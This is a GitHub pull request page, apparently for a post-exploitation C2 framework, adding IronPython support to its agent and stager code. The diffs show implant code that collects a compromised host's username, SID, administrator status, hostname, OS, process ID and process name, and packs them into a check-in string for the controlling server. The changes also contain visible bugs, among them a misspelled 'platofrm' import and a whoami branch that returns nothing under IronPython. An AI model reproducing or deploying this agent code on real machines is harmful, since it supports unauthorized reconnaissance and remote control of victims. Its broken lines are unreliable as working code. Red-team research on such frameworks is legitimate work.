Skip to content
This repository was archived by the owner on Jan 29, 2020. It is now read-only.

IronPython Support [WIP] #1250

Open
ihamburglar wants to merge 8 commits into
base: dev
Choose a base branch
from
Open

IronPython Support [WIP] #1250

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
cf6bb3e
Modifications of OS enumeration
ihamburglar Oct 9, 2018
5bb3f5a
Modifications of Listener
ihamburglar Oct 9, 2018
06b7a1b
Added IPy dependencies to setup.sh
ihamburglar Oct 9, 2018
c339782
Fix typos and add a few things
ihamburglar Oct 11, 2018
e601c03
Add IronPython C# stager
ihamburglar Oct 11, 2018
23f13dd
Added remote python https importer
ihamburglar Oct 11, 2018
a442db6
Added IronPython C# shell project
ihamburglar Oct 11, 2018
c467813
updated httpimport.py to remove unessary code
ihamburglar Oct 11, 2018
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
23 changes: 17 additions & 6 deletions data/agent/agent.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -19,11 +19,15 @@
import marshal
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import platofrm
if platform.python_implementation() == 'IronPython':
from System import Environment
else:
import pwd
import grp
from stat import S_ISREG, ST_CTIME, ST_MODE
from os.path import expanduser
from StringIO import StringIO
Expand Down Expand Up @@ -906,9 +910,13 @@ def directory_listing(path):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)

user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
if platform.python_implementation() == 'IronPython':
user = Environment.UserName
#Needed?
group = "Users"
else:
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]

# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
Expand Down Expand Up @@ -961,7 +969,10 @@ def run_command(command, cmdargs=None):
return "Created directory: {}".format(cmdargs)

elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
if platform.python_implementation() == 'IronPython':
username = Environment.UserName
else:
return pwd.getpwuid(os.getuid())[0]

elif re.compile("hostname").match(command):
return str(socket.gethostname())
Expand Down
58 changes: 43 additions & 15 deletions data/agent/stagers/common/get_sysinfo.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,6 +1,12 @@
import platform
if platform.python_implementation() == 'IronPython':
from System.Diagnostics import Process
from System import Environment
from System.Security.Principal import WindowsIdentity, WindowsPrincipal, WindowsBuiltInRole
Copy link
Copy Markdown
Contributor Author

@ihamburglar ihamburglar Oct 11, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

These are IronPython specific imports that enable operating system enumeration via .Net rather than normal *nix style enumeration. This the stager should still do the normal thing on *nix envs.

else:
import pwd
import os
import sys
import pwd
import socket
import subprocess

Expand All @@ -11,23 +17,36 @@ def get_sysinfo(nonce='00000000'):
__FAILED_FUNCTION = '[FAILED QUERY]'

try:
username = pwd.getpwuid(os.getuid())[0].strip("\\")
if platform.python_implementation() == 'IronPython':
username = WindowsIdentity.GetCurrent().User.ToString()
else:
username = pwd.getpwuid(os.getuid())[0].strip("\\")
except Exception as e:
username = __FAILED_FUNCTION
try:
uid = os.popen('id -u').read().strip()
if platform.python_implementation() == 'IronPython':
uid = WindowsIdentity.GetCurrent().User.ToString()
else:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
highIntegrity = "True" if (uid == "0") else False
if platform.python_implementation() == 'IronPython':
highIntegrity = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)
else:
highIntegrity = "True" if (uid == "0") else False
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
osDetails = os.uname()
if platform.python_implementation() != 'IronPython':
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
hostname = osDetails[1]
if platform.python_implementation() == 'IronPython':
hostname = Environment.MachineName
else:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
Expand All @@ -38,11 +57,17 @@ def get_sysinfo(nonce='00000000'):
except Exception as e1:
internalIP = __FAILED_FUNCTION
try:
osDetails = ",".join(osDetails)
if platform.python_implementation() == 'IronPython':
osDetails = Environment.OSVersion.ToString()
else:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
processID = os.getpid()
if platform.python_implementation() == 'IronPython':
processID = Process.GetCurrentProcess().Id
else:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
Expand All @@ -52,13 +77,16 @@ def get_sysinfo(nonce='00000000'):
pyVersion = __FAILED_FUNCTION

language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = ps.communicate()
parts = out.split("\n")
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
if platform.python_implementation() == 'IronPython':
processName = Process.GetCurrentProcess().ToString()
else:
processName = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = ps.communicate()
parts = out.split("\n")
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
processName = 'python'

return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)